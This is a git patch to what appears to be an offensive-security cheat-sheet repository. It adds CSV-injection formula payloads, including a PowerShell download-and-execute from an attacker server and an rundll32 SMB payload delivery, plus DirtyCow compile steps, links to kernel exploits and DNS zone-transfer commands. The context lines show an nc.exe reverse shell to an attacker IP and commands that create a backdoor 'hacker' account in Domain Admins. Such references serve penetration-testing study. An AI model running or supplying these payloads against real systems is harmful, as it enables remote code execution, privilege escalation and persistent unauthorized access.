From 5d4f65720a9dffe82d4850ac98f5ad1581a4658a Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 9 Jun 2019 20:53:41 +0200
Subject: [PATCH] PrivEsc - Common Exploits

---
 CSV Injection/README.md                       |  8 ++++
 .../Linux - Privilege Escalation.md           | 44 +++++++++++++++++++
 .../Methodology and enumeration.md            | 12 +++++
 .../Windows - Privilege Escalation.md         |  1 -
 .../Windows - Using credentials.md            |  3 +-
 5 files changed, 66 insertions(+), 2 deletions(-)

diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index 126105d6..5261b09c 100644
--- a/CSV Injection/README.md	
+++ b/CSV Injection/README.md	
@@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i
 Basic exploit with Dynamic Data Exchange
 
 ```powershell
+# pop a calc
 DDE ("cmd";"/C calc";"!A0")A0
 @SUM(1+1)*cmd|' /C calc'!A0
+
+# pop a notepad
 =cmd|' /C notepad'!'A1'
+
+# powershell download and execute
 =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
+
+# msf smb delivery with rundll32
+=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
 ```
 
 Technical Details of the above payload:
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index 36820bcc..09af954d 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -43,6 +43,11 @@
 * [Groups](#groups)
     * [Docker](#docker)
     * [LXC/LXD](#lxclxd)
+* [Common Exploits](#common-exploits)
+    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
+    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
+    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
 
 ## Checklists
 
@@ -537,6 +542,45 @@ lxc exec mycontainer /bin/sh
 
 Alternatively https://github.com/initstring/lxd_root
 
+
+## Common Exploits
+
+### CVE-2016-5195 (DirtyCow)
+
+Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
+
+```powershell
+# make dirtycow stable
+echo 0 > /proc/sys/vm/dirty_writeback_centisecs
+g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
+https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
+```
+
+### CVE-2010-3904 (RDS)
+
+Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
+
+```powershell
+https://www.exploit-db.com/exploits/15285/
+```
+
+### CVE-2010-4258 (Full Nelson)
+
+Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
+
+```powershell
+https://www.exploit-db.com/exploits/15704/
+```
+
+### CVE-2012-0056 (Mempodipper)
+
+Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
+
+```powershell
+https://www.exploit-db.com/exploits/18411
+```
+
+
 ## References
 
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md
index 65cd22d2..8270db14 100644
--- a/Methodology and Resources/Methodology and enumeration.md	
+++ b/Methodology and Resources/Methodology and enumeration.md	
@@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
   index: 0x8 Account: root Name: root Desc: (null)
   ```  
 
+* Zone Transfer
+
+  ```powershell
+  host -t ns domain.local
+  domain.local name server master.domain.local.
+
+  host master.domain.local        
+  master.domain.local has address 192.168.1.1
+ 
+  dig axfr domain.local @192.168.1.1
+  ```
+
 ## List all the subdirectories and files
 
 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 5e820c0a..87852a24 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -603,7 +603,6 @@ $ computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 
-
 ## EoP - Common Vulnerabilities and Exposure
 
 ### Token Impersonation (RottenPotato)
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index 0234bbbb..17f22cf5 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -5,7 +5,8 @@
 ```powershell
 net user hacker hacker1234* /add
 net localgroup administrators hacker /add
-net localgroup "Remote Desktop Users" hacker /add
+net localgroup "Remote Desktop Users" hacker /add # RDP access
+net localgroup "Backup Operators" hacker /add # Full access to files
 net group "Domain Admins" hacker /add /domain
 ```